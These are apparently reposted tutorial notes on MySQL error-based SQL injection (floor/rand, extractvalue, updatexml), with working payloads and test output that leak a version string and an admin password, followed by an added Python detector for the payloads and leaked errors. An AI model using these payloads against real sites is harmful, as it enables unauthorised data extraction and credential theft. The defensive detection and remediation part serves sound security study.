Reposting some old notes. When MySQL fails to execute a statement it throws an error message, and sites built on PHP+MySQL often print that error straight onto the page, so specific data can be retrieved with the three constructions below.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error with floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked inside the duplicate-key error. To retrieve other data, replace the version() expression with the query whose result you want.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
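The following is an added example (not part of the original notes) showing how a defender can detect all three techniques above from both sides: signatures for the payload in a request's query string, and the leaked MySQL error text (the 1062 "Duplicate entry ... group_key" and 1105 "XPATH syntax error" lines) in a response or application log, including recovery of the value that was leaked. Every sample request and error line is constructed from the payloads and errors shown in these notes.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the original notes: request-side patterns for the three
# error-based techniques described above, checked after URL-decoding.
REQUEST_SIGNATURES = {
    "floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Server-side: the MySQL error texts quoted in the notes. If these show up in an
# HTTP response or application log, the error page is leaking query results.
ERROR_SIGNATURES = {
    "floor": re.compile(r"ERROR 1062 \(23000\): Duplicate entry '(.*)[01]' for key 'group_key'"),
    "xpath": re.compile(r"ERROR 1105 \(HY000\): XPATH syntax error: '(.*)'"),
}

def classify_request(query_string):
    """Names of error-based techniques present in a raw (URL-encoded) query string."""
    decoded = unquote_plus(query_string)
    return sorted(name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded))

def classify_error(line):
    """(technique, leaked value) if `line` is one of the leaking errors, else None."""
    for name, rx in ERROR_SIGNATURES.items():
        m = rx.search(line)
        if m:
            value = m.group(1)  # floor: the regex already dropped the trailing 0/1 from floor(rand(0)*2)
            # xpath: strip the 0x5c ('\') and 0x5e24 ('^$') delimiters the payloads wrap around the value
            return name, value.strip("\\^$") if name == "xpath" else value
    return None

# Constructed sample data: access-log query strings and application-log error lines.
SAMPLE_REQUESTS = [
    "id=1",
    "id=1+and+extractvalue(1,concat(0x5c,(select+table_name+from+information_schema.tables+limit+1)))",
    "id=1+and+1%3D(updatexml(1,concat(0x5e24,(select+user()),0x5e24),1))",
    "id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
]
SAMPLE_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'",
    "ERROR 1146 (42S02): Table 'test.nosuch' doesn't exist",
]

if __name__ == "__main__":
    print([classify_request(q) for q in SAMPLE_REQUESTS])
    print([classify_error(e) for e in SAMPLE_ERRORS])
```

A hit from classify_error on a response body means the application is forwarding raw MySQL errors to the client; the fix on the PHP side is to stop echoing database errors in production and to pass id as a bound parameter rather than concatenating it into the query.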
All, thanks foreign guys.